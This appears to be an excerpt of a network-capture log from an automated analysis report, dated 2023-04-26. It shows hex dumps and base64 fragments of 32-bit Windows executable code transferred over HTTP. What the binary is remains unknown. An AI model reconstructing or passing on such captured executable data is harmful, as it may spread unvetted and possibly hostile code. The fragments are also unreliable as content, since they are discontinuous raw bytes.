                                                                  2023-04-26 07:00:13 UTC1055INData Raw: 69 51 36 4a 56 67 54 6f 56 6f 55 41 41 4d 49 67 41 4f 67 64 56 50 37 2f 6a 55 57 4d 78 30 58 38 42 41 41 41 41 46 43 4c 52 5a 6a 2f 20 63 42 53 4e 52 52 52 51 6a 55 55 4d 55 49 31 46 30 46 44 2f 64 5a 7a 6f 6a 37 44 2f 2f 34 4e 4e 2f 50 2b 4e 54 59 79 44 78 42 69 4a 52 5a 54 6f 35 69 44 2b 2f 34 42 39 30 41 42 31 43 38 59 44 41 4d 63 48 41 67 41 41 41 4f 75 4c 20 6a 55 57 59 55 50 39 31 6c 49 31 46 6c 46 43 4e 52 64 42 51 36 46 64 71 41 41 43 4c 79 49 50 45 45 49 31 46 30 44 6c 46 6c 48 51 67 67 33 32 59 41 48 55 61 68 63 6b 50 6c 63 43 49 41 34 58 4a 44 34 52 56 2f 2f 2f 2f 67 2f 6b 42 20 44 34 52 4d 2f 2f 2f 2f 36 37 66 47 41 77 48 72 73 6d 6f 38 75 4f 48 54 43 42 44 6f 2b 59 51 41 41 49 76 35 69 33 55 63 6a 55 33 41 69 30 55 49 69 31 30 67 69 55 57 34
                                                                  Data Ascii: iQ6JVgToVoUAAMIgAOgdVP7/jUWMx0X8BAAAAFCLRZj/ cBSNRRRQjUUMUI1F0FD/dZzoj7D//4NN/P+NTYyDxBiJRZTo5iD+/4B90AB1C8YDAMcHAgAAAOuL jUWYUP91lI1FlFCNRdBQ6FdqAACLyIPEEI1F0DlFlHQgg32YAHUahckPlcCIA4XJD4RV////g/kB D4RM////67fGAwHrsmo8uOHTCBDo+YQAAIv5i3UcjU3Ai0UIi10giUW4
                                                                  2023-04-26 07:00:13 UTC1071INData Raw: 77 45 49 76 4f 2f 78 58 30 38 67 67 51 69 38 76 2f 31 6f 54 41 64 51 69 44 78 77 49 37 66 52 42 31 33 46 36 4c 78 31 39 62 58 63 49 4d 41 46 57 4c 37 46 4e 58 69 33 30 4d 69 39 6b 37 20 66 52 42 30 4a 6c 59 50 74 77 2b 4c 41 31 48 2f 64 51 69 4c 63 42 43 4c 7a 76 38 56 39 50 49 49 45 49 76 4c 2f 39 61 45 77 48 51 49 67 38 63 43 4f 33 30 51 64 64 78 65 69 38 64 66 57 31 33 43 44 41 42 56 69 2b 79 4e 51 51 68 51 20 2f 33 55 49 36 45 73 79 2f 2f 39 5a 57 56 33 43 42 41 42 56 69 2b 78 57 69 33 55 49 4f 33 55 4d 64 42 78 58 6a 58 6b 49 44 37 63 47 56 31 44 6f 4b 7a 4c 2f 2f 32 61 4a 42 6f 50 47 41 6c 6c 5a 4f 33 55 4d 64 65 6c 66 69 38 5a 65 20 58 63 49 49 41 46 57 4c 37 49 31 42 43 46 44 2f 64 51 6a 6f 35 43 7a 2f 2f 31 6c 5a 58 63 49 45 41 46 57 4c 37 46 61
                                                                  Data Ascii: wEIvO/xX08ggQi8v/1oTAdQiDxwI7fRB13F6Lx19bXcIMAFWL7FNXi30Mi9k7 fRB0JlYPtw+LA1H/dQiLcBCLzv8V9PIIEIvL/9aEwHQIg8cCO30Qddxei8dfW13CDABVi+yNQQhQ /3UI6Esy//9ZWV3CBABVi+xWi3UIO3UMdBxXjXkID7cGV1DoKzL//2aJBoPGAllZO3UMdelfi8Ze XcIIAFWL7I1BCFD/dQjo5Cz//1lZXcIEAFWL7Fa
                                                                  2023-04-26 07:00:13 UTC1087INData Raw: 59 20 55 47 6f 47 36 61 44 39 2f 2f 39 6f 63 41 6b 4a 45 4f 6b 34 2f 2f 2f 2f 61 49 51 4a 43 52 44 70 4c 76 2f 2f 2f 32 68 30 43 51 6b 51 55 6f 31 46 46 46 43 4e 52 51 78 51 36 47 33 42 2f 76 2b 44 78 42 43 46 77 48 6b 46 67 77 34 43 20 36 77 79 44 2b 41 46 2b 42 34 74 46 4a 49 4e 41 43 41 79 4e 52 52 52 51 6a 55 30 4d 36 42 33 34 2f 76 2b 45 77 48 51 44 67 77 34 42 69 30 55 49 69 30 30 4d 69 31 55 51 69 51 69 4a 55 41 54 6f 48 43 59 41 41 4d 49 6f 41 47 6f 59 20 75 46 6a 69 43 42 44 6f 4d 79 59 41 41 49 76 5a 69 56 33 77 69 30 55 63 6a 55 33 6b 2f 33 41 77 36 4e 37 30 2f 66 2b 44 5a 66 77 41 6a 55 58 6b 55 4f 69 42 76 2f 33 2f 67 30 33 38 2f 34 76 77 57 59 31 4e 35 49 6c 31 37 4f 69 2f 20 77 66 33 2f 69 38 76 6f 57 4f 66 2b 2f 34 76 59 68 64 74 31 41 32
                                                                  Data Ascii: Y UGoG6aD9//9ocAkJEOk4////aIQJCRDpLv///2h0CQkQUo1FFFCNRQxQ6G3B/v+DxBCFwHkFgw4C 6wyD+AF+B4tFJINACAyNRRRQjU0M6B34/v+EwHQDgw4Bi0UIi00Mi1UQiQiJUAToHCYAAMIoAGoY uFjiCBDoMyYAAIvZiV3wi0UcjU3k/3Aw6N70/f+DZfwAjUXkUOiBv/3/g038/4vwWY1N5Il17Oi/ wf3/i8voWOf+/4vYhdt1A2
                                                                  2023-04-26 07:00:13 UTC1103INData Raw: 69 4a 4f 32 53 4a 48 51 41 41 41 41 42 66 58 6c 76 4a 20 77 67 67 41 56 59 76 73 56 76 79 4c 64 51 79 4c 54 67 67 7a 7a 75 67 75 36 76 2f 2f 61 67 42 57 2f 33 59 55 2f 33 59 4d 61 67 44 2f 64 52 44 2f 64 68 44 2f 64 51 6a 6f 35 69 6b 41 41 49 50 45 49 46 35 64 77 31 57 4c 37 49 74 4e 20 44 46 61 4c 64 51 69 4a 44 75 67 63 49 51 41 41 69 30 67 6b 69 55 34 45 36 42 45 68 41 41 43 4a 63 43 53 4c 78 6c 35 64 77 31 57 4c 37 46 62 6f 41 43 45 41 41 49 74 31 43 44 74 77 4a 48 55 4f 69 33 59 45 36 50 41 67 41 41 43 4a 20 63 43 52 65 58 63 50 6f 35 53 41 41 41 49 74 49 4a 49 50 42 42 4f 73 48 4f 2f 42 30 43 34 31 49 42 49 73 42 68 63 42 30 43 65 76 78 69 30 59 45 69 51 48 72 32 75 67 38 33 67 41 41 7a 46 57 4c 37 46 46 54 2f 49 74 46 44 49 74 49 20 43 44 4e 4e 44
                                                                  Data Ascii: iJO2SJHQAAAABfXlvJ wggAVYvsVvyLdQyLTggzzugu6v//agBW/3YU/3YMagD/dRD/dhD/dQjo5ikAAIPEIF5dw1WL7ItN DFaLdQiJDugcIQAAi0gkiU4E6BEhAACJcCSLxl5dw1WL7FboACEAAIt1CDtwJHUOi3YE6PAgAACJ cCReXcPo5SAAAItIJIPBBOsHO/B0C41IBIsBhcB0Cevxi0YEiQHr2ug83gAAzFWL7FFT/ItFDItI CDNND
                                                                  2023-04-26 07:00:13 UTC1119INData Raw: 33 55 51 69 30 30 49 2f 31 55 4d 58 63 49 4d 41 46 57 4c 37 50 39 31 46 49 74 4e 43 50 39 31 45 50 39 56 20 44 46 33 43 45 41 42 56 69 2b 79 4c 52 51 69 4c 51 42 78 64 77 38 7a 4d 7a 46 57 4c 37 49 50 73 42 46 4e 52 69 30 55 4d 67 38 41 4d 69 55 58 38 69 30 55 49 56 66 39 31 45 49 74 4e 45 49 74 74 2f 4f 69 64 42 41 41 41 56 6c 66 2f 20 30 46 39 65 69 39 31 64 69 30 30 51 56 59 76 72 67 66 6b 41 41 51 41 41 64 51 57 35 41 67 41 41 41 46 48 6f 65 77 51 41 41 46 31 5a 57 38 6e 43 44 41 42 56 69 2b 79 68 39 50 49 49 45 44 31 51 72 51 49 51 64 42 39 6b 69 77 30 59 20 41 41 41 41 69 30 55 49 69 34 44 45 41 41 41 41 4f 30 45 49 63 67 55 37 51 51 52 32 42 57 6f 4e 57 63 30 70 58 63 50 4d 7a 4d 7a 4d 55 31 5a 58 69 31 51 6b 45 49 74 45 4a 42 53 4c 54 43 51 59 56
                                                                  Data Ascii: 3UQi00I/1UMXcIMAFWL7P91FItNCP91EP9V DF3CEABVi+yLRQiLQBxdw8zMzFWL7IPsBFNRi0UMg8AMiUX8i0UIVf91EItNEItt/OidBAAAVlf/ 0F9ei91di00QVYvrgfkAAQAAdQW5AgAAAFHoewQAAF1ZW8nCDABVi+yh9PIIED1QrQIQdB9kiw0Y AAAAi0UIi4DEAAAAO0EIcgU7QQR2BWoNWc0pXcPMzMzMU1ZXi1QkEItEJBSLTCQYV
                                                                  2023-04-26 07:00:13 UTC1135INData Raw: 46 34 58 62 66 78 4e 38 42 49 58 2f 63 77 33 33 33 34 50 54 41 50 66 62 67 38 6c 41 69 55 34 67 67 33 34 6f 41 48 30 4a 78 30 59 6f 41 51 41 41 41 4f 73 52 20 2f 33 59 6f 67 2b 48 33 69 55 34 67 6a 55 35 41 36 49 76 6b 2f 2f 2b 4c 78 77 76 44 64 51 53 44 5a 69 44 66 67 33 33 38 43 49 76 4f 2f 33 55 4d 78 6b 59 38 41 66 39 31 43 48 55 4a 55 31 66 6f 43 2b 66 2f 2f 2b 73 47 56 2b 6a 75 20 35 66 2f 2f 69 30 59 67 77 65 67 48 71 41 46 30 48 6f 4e 2b 4f 41 42 71 4d 46 70 30 43 49 74 47 4e 47 59 35 45 48 51 4e 67 30 59 30 2f 6f 74 4f 4e 47 61 4a 45 66 39 47 4f 4c 41 42 58 31 35 62 79 63 49 49 41 49 76 2f 56 6f 76 78 20 56 34 4e 47 46 41 53 4c 52 68 53 4c 65 50 7a 6f 68 62 38 41 41 49 58 41 64 52 54 6f 63 64 72 2f 2f 38 63 41 46 67 41 41 41 4f 68 43 31 2f 2f 2f
                                                                  Data Ascii: F4XbfxN8BIX/cw3334PTAPfbg8lAiU4gg34oAH0Jx0YoAQAAAOsR /3Yog+H3iU4gjU5A6Ivk//+LxwvDdQSDZiDfg338CIvO/3UMxkY8Af91CHUJU1foC+f//+sGV+ju 5f//i0YgwegHqAF0HoN+OABqMFp0CItGNGY5EHQNg0Y0/otONGaJEf9GOLABX15bycIIAIv/Vovx V4NGFASLRhSLePzohb8AAIXAdRTocdr//8cAFgAAAOhC1///
                                                                  2023-04-26 07:00:13 UTC1151INData Raw: 39 79 66 66 51 69 5a 58 55 39 76 2f 2f 69 59 57 38 39 76 2f 2f 64 41 4e 42 36 77 4b 4c 79 6f 30 45 48 6f 50 34 63 33 59 74 69 5a 58 55 39 50 2f 2f 69 5a 56 63 2f 50 2f 2f 55 6f 32 46 32 50 54 2f 2f 31 43 4e 20 68 57 44 38 2f 2f 39 6f 7a 41 45 41 41 46 44 6f 37 41 63 41 41 49 50 45 45 4f 6e 4e 41 41 41 41 61 69 42 59 4b 38 45 37 78 78 76 53 39 39 6f 44 31 67 50 54 69 5a 58 51 39 76 2f 2f 67 2f 70 7a 64 68 45 7a 77 49 6d 46 31 50 54 2f 20 2f 34 6d 46 58 50 7a 2f 2f 31 44 72 74 59 31 4b 2f 34 31 47 2f 34 6d 4e 79 50 62 2f 2f 7a 76 49 64 48 79 4c 2b 59 32 56 58 50 7a 2f 2f 79 76 2b 6a 52 53 36 4f 2f 74 7a 42 59 74 43 42 4f 73 43 4d 38 43 4a 68 64 54 32 2f 2f 2b 4e 20 52 2f 38 37 77 33 4d 45 69 77 4c 72 41 6a 50 41 49 34 57 38 39 76 2f 2f 67 2b 6f 45 69 34 32
                                                                  Data Ascii: 9yffQiZXU9v//iYW89v//dANB6wKLyo0EHoP4c3YtiZXU9P//iZVc/P//Uo2F2PT//1CN hWD8//9ozAEAAFDo7AcAAIPEEOnNAAAAaiBYK8E7xxvS99oD1gPTiZXQ9v//g/pzdhEzwImF1PT/ /4mFXPz//1DrtY1K/41G/4mNyPb//zvIdHyL+Y2VXPz//yv+jRS6O/tzBYtCBOsCM8CJhdT2//+N R/87w3MEiwLrAjPAI4W89v//g+oEi42
                                                                  2023-04-26 07:00:13 UTC1167INData Raw: 44 2b 67 46 31 46 59 74 46 20 2f 49 75 41 72 41 41 41 41 49 6d 42 72 41 41 41 41 49 6d 35 73 41 41 41 41 49 74 31 2f 49 6c 39 36 49 48 47 74 41 41 41 41 4f 73 42 51 2f 62 44 41 58 58 36 67 2f 6f 42 64 53 69 4c 77 39 48 6f 6a 51 78 42 69 30 58 73 69 51 77 47 20 69 30 58 77 2f 7a 59 72 77 39 48 6f 55 46 48 6f 6b 61 6a 2f 2f 34 50 45 44 49 58 41 44 34 57 50 41 77 41 41 69 77 36 4e 55 51 4a 6d 69 77 47 44 77 51 4a 6d 4f 38 64 31 39 59 74 46 36 43 76 4b 69 31 58 34 67 38 59 45 30 66 6d 4e 20 48 45 75 4c 54 66 53 44 77 77 4a 41 69 55 58 6f 67 2f 67 48 63 70 2b 4c 64 66 79 4a 66 65 69 42 78 74 41 41 41 41 44 72 41 55 50 32 77 77 46 31 2b 6f 4e 39 2b 41 46 31 4b 34 74 4e 39 49 76 44 30 65 69 4e 44 45 47 4c 52 65 79 4a 20 44 41 61 4c 52 66 44 2f 4e 69 76 44 30 65
                                                                  Data Ascii: D+gF1FYtF /IuArAAAAImBrAAAAIm5sAAAAIt1/Il96IHGtAAAAOsBQ/bDAXX6g/oBdSiLw9HojQxBi0XsiQwG i0Xw/zYrw9HoUFHokaj//4PEDIXAD4WPAwAAiw6NUQJmiwGDwQJmO8d19YtF6CvKi1X4g8YE0fmN HEuLTfSDwwJAiUXog/gHcp+LdfyJfeiBxtAAAADrAUP2wwF1+oN9+AF1K4tN9IvD0eiNDEGLReyJ DAaLRfD/NivD0e
                                                                  2023-04-26 07:00:13 UTC1183INData Raw: 73 4a 69 55 45 45 36 4d 37 2b 2f 2f 2b 4c 43 34 50 45 45 49 73 4a 69 55 45 49 20 4d 38 44 72 41 34 50 49 2f 31 39 65 57 38 6e 44 69 2f 39 56 69 2b 79 44 37 42 52 54 69 39 6c 58 69 56 33 73 69 77 4f 4c 4f 49 58 2f 64 51 69 44 79 50 2f 70 74 77 41 41 41 49 73 56 4e 4e 41 4c 45 49 76 4b 56 6f 73 33 67 2b 45 66 20 69 33 38 45 4d 2f 49 7a 2b 74 50 4f 30 38 2b 46 39 67 2b 45 6b 77 41 41 41 49 50 2b 2f 77 2b 45 69 67 41 41 41 49 6c 56 2f 49 6c 39 39 49 6c 31 2b 49 50 76 42 44 76 2b 63 6c 53 4c 42 7a 74 46 2f 48 54 79 4d 38 4b 4c 56 66 7a 54 20 79 49 76 49 69 52 65 4a 52 66 44 2f 46 66 54 79 43 42 44 2f 56 66 43 4c 41 34 73 56 4e 4e 41 4c 45 49 76 4b 67 2b 45 66 69 77 43 4c 47 49 74 41 42 44 50 61 30 38 73 7a 77 74 50 49 4f 31 33 34 69 56 33 77 69 31 33 73 64 51
                                                                  Data Ascii: sJiUEE6M7+//+LC4PEEIsJiUEI M8DrA4PI/19eW8nDi/9Vi+yD7BRTi9lXiV3siwOLOIX/dQiDyP/ptwAAAIsVNNALEIvKVos3g+Ef i38EM/Iz+tPO08+F9g+EkwAAAIP+/w+EigAAAIlV/Il99Il1+IPvBDv+clSLBztF/HTyM8KLVfzT yIvIiReJRfD/FfTyCBD/VfCLA4sVNNALEIvKg+EfiwCLGItABDPa08szwtPIO134iV3wi13sdQ
                                                                  2023-04-26 07:00:13 UTC1199INData Raw: 66 2f 2f 61 68 5a 65 69 54 44 6f 63 52 72 2f 2f 34 76 47 36 54 49 42 41 41 43 44 66 52 41 41 64 75 53 44 66 52 51 41 64 4e 36 44 20 66 52 67 41 64 74 69 4c 64 52 78 54 4d 39 75 44 2f 6b 46 30 45 6f 50 2b 52 58 51 4e 67 2f 35 47 64 41 69 49 58 66 79 44 2f 6b 64 31 42 4d 5a 46 2f 41 47 4c 54 53 53 4c 77 59 50 67 43 41 76 44 64 55 48 2f 64 51 6a 6f 34 50 58 2f 20 2f 31 6d 4c 79 49 58 4a 64 43 2b 4c 52 51 67 35 57 41 52 2f 44 48 77 45 4f 52 68 7a 42 73 5a 46 2b 41 48 72 41 34 68 64 2b 50 39 31 2f 50 39 31 45 46 66 2f 64 66 68 52 36 41 6e 2b 2f 2f 2b 44 78 42 54 70 74 41 41 41 41 49 74 4e 20 4a 49 76 42 67 2b 41 51 43 38 4e 30 42 47 6f 44 36 77 4a 71 41 6f 50 68 49 41 76 4c 57 48 51 44 69 31 30 77 67 2f 35 68 66 79 74 30 43 6f 50 75 51 58 51 46 67 2b 34 45 36
                                                                  Data Ascii: f//ahZeiTDocRr//4vG6TIBAACDfRAAduSDfRQAdN6D fRgAdtiLdRxTM9uD/kF0EoP+RXQNg/5GdAiIXfyD/kd1BMZF/AGLTSSLwYPgCAvDdUH/dQjo4PX/ /1mLyIXJdC+LRQg5WAR/DHwEORhzBsZF+AHrA4hd+P91/P91EFf/dfhR6An+//+DxBTptAAAAItN JIvBg+AQC8N0BGoD6wJqAoPhIAvLWHQDi10wg/5hfyt0CoPuQXQFg+4E6
                                                                  2023-04-26 07:00:13 UTC1215INData Raw: 41 75 73 43 61 67 52 59 58 63 4f 34 41 41 49 41 41 46 33 44 44 37 66 4a 67 65 45 41 67 41 41 41 5a 6f 58 41 64 52 37 33 52 51 7a 2f 2f 77 38 41 64 51 61 44 66 51 67 41 64 41 2f 33 20 32 52 76 4a 67 2b 47 51 6a 59 47 41 41 41 41 41 58 63 50 64 52 51 6a 5a 37 74 72 70 33 2b 44 32 78 45 52 36 44 50 66 5a 47 38 6d 44 34 65 43 4e 51 55 42 64 77 2f 66 5a 47 38 6d 42 34 51 6a 2f 2f 2f 2b 4e 67 51 41 42 41 41 42 64 20 77 34 76 2f 56 59 76 73 67 2b 77 63 55 34 74 64 45 46 5a 58 69 33 30 49 4d 2f 61 46 2f 33 51 4e 4d 38 43 46 32 77 2b 45 66 51 45 41 41 47 61 4a 42 7a 6c 31 44 48 55 59 36 4b 7a 74 2f 76 2f 48 41 42 59 41 41 41 44 6f 66 65 72 2b 20 2f 34 50 49 2f 2b 6c 64 41 51 41 41 2f 33 55 55 6a 55 33 6b 36 4d 76 71 2f 76 2b 4c 52 65 69 4c 53 41 69 42 2b 65 6e 39
                                                                  Data Ascii: AusCagRYXcO4AAIAAF3DD7fJgeEAgAAAZoXAdR73RQz//w8AdQaDfQgAdA/3 2RvJg+GQjYGAAAAAXcPdRQjZ7trp3+D2xER6DPfZG8mD4eCNQUBdw/fZG8mB4Qj///+NgQABAABd w4v/VYvsg+wcU4tdEFZXi30IM/aF/3QNM8CF2w+EfQEAAGaJBzl1DHUY6Kzt/v/HABYAAADofer+ /4PI/+ldAQAA/3UUjU3k6Mvq/v+LReiLSAiB+en9
                                                                  2023-04-26 07:00:13 UTC1231INData Raw: 20 2b 76 2f 2f 4d 2f 2b 4a 68 68 77 43 41 41 43 44 78 41 52 48 36 57 62 2f 2f 2f 38 35 50 62 53 46 44 42 41 50 68 62 41 41 41 41 43 44 79 50 2f 70 73 51 41 41 41 47 67 42 41 51 41 41 6a 55 59 59 56 31 44 6f 34 35 48 2b 2f 34 50 45 20 44 47 74 46 35 44 43 4a 52 65 43 4e 67 4a 44 59 43 78 43 4a 52 65 53 41 4f 41 43 4c 79 48 51 31 69 6b 45 42 68 4d 42 30 4b 77 2b 32 45 51 2b 32 77 4f 73 58 67 66 6f 41 41 51 41 41 63 78 4f 4b 68 33 6a 59 43 78 41 49 52 42 59 5a 20 51 67 2b 32 51 51 45 37 30 48 62 6c 67 38 45 43 67 44 6b 41 64 63 36 4c 52 65 52 48 67 38 41 49 69 55 58 6b 67 2f 38 45 63 72 68 54 69 56 34 45 78 30 59 49 41 51 41 41 41 4f 69 77 2b 66 2f 2f 67 38 51 45 69 59 59 63 41 67 41 41 20 69 30 58 67 6a 55 34 4d 61 67 61 4e 6b 49 54 59 43 78 42 66 5a 6f 73
                                                                  Data Ascii: +v//M/+JhhwCAACDxARH6Wb///85PbSFDBAPhbAAAACDyP/psQAAAGgBAQAAjUYYV1Do45H+/4PE DGtF5DCJReCNgJDYCxCJReSAOACLyHQ1ikEBhMB0Kw+2EQ+2wOsXgfoAAQAAcxOKh3jYCxAIRBYZ Qg+2QQE70Hblg8ECgDkAdc6LReRHg8AIiUXkg/8EcrhTiV4Ex0YIAQAAAOiw+f//g8QEiYYcAgAA i0XgjU4MagaNkITYCxBfZos
                                                                  2023-04-26 07:00:13 UTC1247INData Raw: 70 33 52 4d 41 41 49 31 46 43 46 44 6f 43 32 6a 2f 20 2f 31 6d 46 77 48 51 4a 69 34 31 38 2b 50 2f 2f 69 56 6b 45 67 2b 67 42 44 34 53 68 45 77 41 41 67 2b 67 42 44 34 53 4f 45 77 41 41 67 2b 67 42 44 34 52 37 45 77 41 41 67 2b 67 42 44 34 52 6f 45 77 41 41 69 30 55 49 67 65 62 2f 20 2f 2f 39 2f 67 36 57 45 2b 50 2f 2f 41 49 6c 46 43 49 74 46 45 49 6c 31 44 45 44 64 52 51 6a 64 6c 61 54 34 2f 2f 2b 4c 74 61 6a 34 2f 2f 2b 4c 7a 6f 6d 46 69 50 6a 2f 2f 38 48 70 46 49 76 42 4a 66 38 48 41 41 43 44 79 41 42 31 20 43 6a 50 53 69 5a 32 77 2b 50 2f 2f 36 77 30 7a 77 4c 6f 41 41 42 41 41 49 59 57 77 2b 50 2f 2f 69 37 32 6b 2b 50 2f 2f 67 65 62 2f 2f 77 38 41 41 2f 69 4c 68 62 44 34 2f 2f 2b 4a 76 59 7a 34 2f 2f 38 54 38 6f 48 68 2f 77 63 41 20 41 41 50 42 69 59
                                                                  Data Ascii: p3RMAAI1FCFDoC2j/ /1mFwHQJi418+P//iVkEg+gBD4ShEwAAg+gBD4SOEwAAg+gBD4R7EwAAg+gBD4RoEwAAi0UIgeb/ //9/g6WE+P//AIlFCItFEIl1DEDdRQjdlaT4//+Ltaj4//+LzomFiPj//8HpFIvBJf8HAACDyAB1 CjPSiZ2w+P//6w0zwLoAABAAIYWw+P//i72k+P//geb//w8AA/iLhbD4//+JvYz4//8T8oHh/wcA AAPBiY
                                                                  2023-04-26 07:00:13 UTC1263INData Raw: 74 4e 38 47 53 4a 44 51 41 41 41 41 42 5a 58 31 35 62 79 63 49 4d 41 49 74 31 35 49 74 4e 45 50 38 78 20 36 4a 76 6e 2f 2f 39 5a 77 34 76 2f 56 59 76 73 67 2b 77 51 56 6f 74 31 43 49 50 2b 2f 6e 55 4e 36 4f 6c 66 2f 76 2f 48 41 41 6b 41 41 41 44 72 57 59 58 32 65 45 55 37 4e 65 43 44 44 42 42 7a 50 59 76 47 69 39 61 44 34 44 2f 42 20 2b 67 5a 72 79 44 69 4c 42 4a 58 67 67 51 77 51 39 6b 51 49 4b 41 46 30 49 6f 31 46 43 49 6c 31 2b 49 6c 46 39 49 31 4e 2f 34 31 46 2b 49 6c 31 38 46 43 4e 52 66 52 51 6a 55 58 77 55 4f 6a 35 2f 76 2f 2f 36 78 50 6f 6b 31 2f 2b 20 2f 38 63 41 43 51 41 41 41 4f 68 6b 58 50 37 2f 67 38 6a 2f 58 73 6e 44 69 2f 39 56 69 2b 79 42 37 49 77 41 41 41 43 68 4e 4e 41 4c 45 44 50 46 69 55 58 38 69 30 55 4d 69 39 43 44 34 44 2f 42 2b 67
                                                                  Data Ascii: tN8GSJDQAAAABZX15bycIMAIt15ItNEP8x 6Jvn//9Zw4v/VYvsg+wQVot1CIP+/nUN6Olf/v/HAAkAAADrWYX2eEU7NeCDDBBzPYvGi9aD4D/B +gZryDiLBJXggQwQ9kQIKAF0Io1FCIl1+IlF9I1N/41F+Il18FCNRfRQjUXwUOj5/v//6xPok1/+ /8cACQAAAOhkXP7/g8j/XsnDi/9Vi+yB7IwAAAChNNALEDPFiUX8i0UMi9CD4D/B+g
                                                                  2023-04-26 07:00:13 UTC1279INData Raw: 41 55 4e 41 42 41 41 41 46 33 44 7a 46 57 4c 37 49 50 73 43 49 50 6b 38 4e 30 63 4a 50 4d 50 66 67 51 6b 36 41 67 41 41 41 44 4a 77 32 59 50 45 6b 51 6b 20 42 4c 6f 41 41 41 41 41 5a 67 38 6f 36 47 59 50 46 4d 42 6d 44 33 50 56 4e 47 59 50 78 63 30 41 5a 67 38 6f 44 66 43 63 43 52 42 6d 44 79 67 56 41 4a 30 4a 45 47 59 50 4b 42 31 67 6e 51 6b 51 5a 67 38 6f 4a 52 43 64 43 52 42 6d 20 44 79 67 31 49 4a 30 4a 45 47 59 50 56 4d 46 6d 44 31 62 44 5a 67 39 59 34 47 59 50 78 63 51 41 4a 66 41 48 41 41 42 6d 44 79 69 67 45 4b 49 4a 45 47 59 50 4b 4c 67 41 6e 67 6b 51 5a 67 39 55 38 47 59 50 58 4d 5a 6d 44 31 6e 30 20 5a 67 39 63 38 76 49 50 57 50 35 6d 44 31 6e 45 5a 67 38 6f 34 47 59 50 57 4d 61 42 34 66 38 50 41 41 43 44 36 51 47 42 2b 66 30 48 41 41 41 50 68
                                                                  Data Ascii: AUNABAAAF3DzFWL7IPsCIPk8N0cJPMPfgQk6AgAAADJw2YPEkQk BLoAAAAAZg8o6GYPFMBmD3PVNGYPxc0AZg8oDfCcCRBmDygVAJ0JEGYPKB1gnQkQZg8oJRCdCRBm Dyg1IJ0JEGYPVMFmD1bDZg9Y4GYPxcQAJfAHAABmDyigEKIJEGYPKLgAngkQZg9U8GYPXMZmD1n0 Zg9c8vIPWP5mD1nEZg8o4GYPWMaB4f8PAACD6QGB+f0HAAAPh
                                                                  2023-04-26 07:00:13 UTC1295INData Raw: 2f 34 74 4e 38 4f 6e 77 58 50 76 2f 7a 4d 7a 4d 7a 4d 79 51 6b 49 74 55 4a 41 69 4e 51 67 79 4c 53 76 67 7a 79 4f 69 72 73 66 33 2f 75 42 79 39 43 68 44 70 6d 38 6a 39 2f 38 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 20 7a 4d 7a 4d 7a 4d 7a 4d 69 30 33 77 36 62 68 63 2b 2f 2b 4c 54 66 44 70 49 46 50 37 2f 34 74 4e 38 4f 6c 6f 55 2f 76 2f 7a 4d 7a 4d 7a 4d 79 51 6b 49 74 55 4a 41 69 4e 51 67 79 4c 53 75 51 7a 79 4f 68 6a 73 66 33 2f 75 46 43 39 20 43 68 44 70 55 38 6a 39 2f 38 7a 4d 7a 4d 7a 4d 7a 49 74 4e 38 4f 6d 78 6c 66 7a 2f 69 30 33 77 67 38 45 45 36 54 31 61 2b 2f 2b 4c 54 66 43 44 77 51 7a 70 4d 6c 72 37 2f 34 74 4e 38 49 50 42 46 4f 6b 6e 57 76 76 2f 69 30 33 77 20 67 38 45 63 36 52 78 61 2b 2f 2b 4c 54 66 43 44 77 53 54 70 45 56 72 37 2f 34 74 4e 38 49 50 42
                                                                  Data Ascii: /4tN8OnwXPv/zMzMzMyQkItUJAiNQgyLSvgzyOirsf3/uBy9ChDpm8j9/8zMzMzMzMzM zMzMzMzMi03w6bhc+/+LTfDpIFP7/4tN8OloU/v/zMzMzMyQkItUJAiNQgyLSuQzyOhjsf3/uFC9 ChDpU8j9/8zMzMzMzItN8Omxlfz/i03wg8EE6T1a+/+LTfCDwQzpMlr7/4tN8IPBFOknWvv/i03w g8Ec6Rxa+/+LTfCDwSTpEVr7/4tN8IPB
                                                                  2023-04-26 07:00:13 UTC1311INData Raw: 53 74 67 7a 79 4f 68 69 20 67 76 33 2f 75 50 44 6c 43 68 44 70 55 70 6e 39 2f 38 7a 4d 7a 4d 7a 4d 6a 55 33 67 36 58 69 50 2b 76 2b 4e 54 66 44 70 63 48 4c 36 2f 34 31 4e 38 4f 6d 49 63 76 72 2f 6a 55 33 77 36 65 42 66 2b 76 2b 4e 54 65 7a 70 57 48 4c 36 20 2f 34 31 4e 37 4f 6c 77 63 76 72 2f 6a 55 33 73 36 63 68 66 2b 76 2b 4e 54 65 7a 70 59 48 4c 36 2f 34 31 4e 37 4f 6b 34 63 76 72 2f 6a 55 33 77 36 56 42 79 2b 76 2b 4e 54 66 44 70 4b 48 4c 36 2f 34 74 4e 43 4f 6b 67 63 76 72 2f 20 69 30 58 6f 67 2b 41 42 44 34 51 4d 41 41 41 41 67 32 58 6f 2f 6f 74 4e 43 4f 6b 6f 63 76 72 2f 77 34 31 4e 34 4f 6b 66 68 66 72 2f 6a 55 33 6b 36 59 64 65 2b 76 2b 4c 54 65 7a 70 44 32 54 36 2f 34 74 4e 43 4f 6e 6e 63 66 72 2f 20 6a 55 33 67 36 66 2b 45 2b 76 2b 4e 54 65 54
                                                                  Data Ascii: StgzyOhi gv3/uPDlChDpUpn9/8zMzMzMjU3g6XiP+v+NTfDpcHL6/41N8OmIcvr/jU3w6eBf+v+NTezpWHL6 /41N7Olwcvr/jU3s6chf+v+NTezpYHL6/41N7Ok4cvr/jU3w6VBy+v+NTfDpKHL6/4tNCOkgcvr/ i0Xog+ABD4QMAAAAg2Xo/otNCOkocvr/w41N4Okfhfr/jU3k6Yde+v+LTezpD2T6/4tNCOnncfr/ jU3g6f+E+v+NTeT
                                                                  2023-04-26 07:00:13 UTC1327INData Raw: 35 78 41 45 4d 45 4f 6c 4f 51 2f 72 2f 75 63 67 42 44 42 44 70 4a 45 50 36 20 2f 37 6e 49 41 51 77 51 36 54 70 44 2b 76 2b 35 7a 41 45 4d 45 4f 6b 51 51 2f 72 2f 75 63 77 42 44 42 44 70 4a 6b 50 36 2f 37 6e 51 41 51 77 51 36 66 78 43 2b 76 2b 35 30 41 45 4d 45 4f 6b 53 51 2f 72 2f 75 64 51 42 44 42 44 70 20 36 45 4c 36 2f 37 6e 41 41 51 77 51 36 66 36 6b 2b 2f 2b 35 76 41 45 4d 45 4f 6d 55 7a 2f 76 2f 75 54 67 43 44 42 44 70 79 6b 4c 36 2f 37 6b 34 41 67 77 51 36 65 42 43 2b 76 2b 35 50 41 49 4d 45 4f 6d 32 51 76 72 2f 75 54 77 43 20 44 42 44 70 7a 45 4c 36 